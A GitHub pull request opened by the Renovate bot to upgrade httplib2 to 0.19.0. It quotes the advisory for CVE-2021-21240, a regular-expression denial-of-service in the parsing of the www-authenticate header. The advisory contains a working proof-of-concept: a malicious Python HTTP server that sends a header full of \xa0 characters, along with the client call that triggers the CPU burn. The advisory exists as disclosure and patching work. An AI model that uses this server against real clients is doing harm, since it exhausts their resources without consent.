Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update dependency httplib2 to v0.19.0 [SECURITY] #14

Open
wants to merge 1 commit into
base: master
Choose a base branch
from

Conversation

renovate[bot]
Copy link

@renovate renovate bot commented May 6, 2021

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
httplib2 ==0.18.1 -> ==0.19.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2021-21240

Impact

A malicious server which responds with long series of \xa0 characters in the www-authenticate header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.

Patches

Version 0.19.0 contains new implementation of auth headers parsing, using pyparsing library.
https://github.com/httplib2/httplib2/pull/182

Workarounds

import httplib2
httplib2.USE_WWW_AUTH_STRICT_PARSING = True

Technical Details

The vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338

The section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:

\s*[^ \t\r\n=]+\s*=

Since all three infinitely repeating groups accept the non-breaking space character \xa0, a long string of \xa0 causes catastrophic backtracking.

The complexity is cubic, so doubling the length of the malicious string of \xa0 makes processing take 8 times as long.

Reproduction Steps

Run a malicious server which responds with

www-authenticate: x \xa0\xa0\xa0\xa0x

but with many more \xa0 characters.

An example malicious python server is below:

from http.server import BaseHTTPRequestHandler, HTTPServer

def make_header_value(n_spaces):
    repeat = "\xa0" * n_spaces
    return f"x {repeat}x"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(401)
        self.send_response_only(401)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65512  # Max header line length 65536
        )
        value = make_header_value(n_spaces)
        self.send_header("www-authenticate", value)  # This header can actually be sent multiple times
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 1337), Handler).serve_forever()

Connect to the server with httplib2:

import httplib2
httplib2.Http(".cache").request("http://localhost:1337", "GET")

To benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000

References

Thanks to Ben Caller (Doyensec) for finding vulnerability and discrete notification.

For more information

If you have any questions or comments about this advisory:


Release Notes

httplib2/httplib2

v0.19.0

Compare Source


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.

@renovate renovate bot changed the title Update dependency httplib2 to v0.19.0 [SECURITY] Update dependency httplib2 to v0.19.0 [SECURITY] - autoclosed May 10, 2021
@renovate renovate bot closed this May 10, 2021
@renovate renovate bot deleted the renovate/pypi-httplib2-vulnerability branch May 10, 2021 05:11
@renovate renovate bot changed the title Update dependency httplib2 to v0.19.0 [SECURITY] - autoclosed Update dependency httplib2 to v0.19.0 [SECURITY] May 10, 2021
@renovate renovate bot restored the renovate/pypi-httplib2-vulnerability branch May 10, 2021 07:59
@renovate renovate bot reopened this May 10, 2021
@renovate renovate bot force-pushed the renovate/pypi-httplib2-vulnerability branch from ecb56d5 to 9fcfca3 Compare May 10, 2021 08:00
@renovate renovate bot changed the title Update dependency httplib2 to v0.19.0 [SECURITY] Update dependency httplib2 to v0.19.0 [SECURITY] - autoclosed May 14, 2021
@renovate renovate bot closed this May 14, 2021
@renovate renovate bot deleted the renovate/pypi-httplib2-vulnerability branch May 14, 2021 22:38
@renovate renovate bot changed the title Update dependency httplib2 to v0.19.0 [SECURITY] - autoclosed Update dependency httplib2 to v0.19.0 [SECURITY] May 14, 2021
@renovate renovate bot reopened this May 14, 2021
@renovate renovate bot restored the renovate/pypi-httplib2-vulnerability branch May 14, 2021 23:26
@renovate renovate bot force-pushed the renovate/pypi-httplib2-vulnerability branch from 9fcfca3 to fb29e95 Compare May 14, 2021 23:26
@renovate renovate bot changed the title Update dependency httplib2 to v0.19.0 [SECURITY] Update dependency httplib2 to v0.19.0 [SECURITY] - autoclosed May 22, 2021
@renovate renovate bot closed this May 22, 2021
@renovate renovate bot deleted the renovate/pypi-httplib2-vulnerability branch May 22, 2021 15:41
@renovate renovate bot changed the title Update dependency httplib2 to v0.19.0 [SECURITY] - autoclosed Update dependency httplib2 to v0.19.0 [SECURITY] May 22, 2021
@renovate renovate bot restored the renovate/pypi-httplib2-vulnerability branch May 22, 2021 17:07
@renovate renovate bot reopened this May 22, 2021
@renovate renovate bot force-pushed the renovate/pypi-httplib2-vulnerability branch from fb29e95 to 9c753ee Compare May 22, 2021 17:07
@renovate
Copy link
Author

renovate bot commented Mar 23, 2023

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

Warning: custom changes will be lost.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

1 participant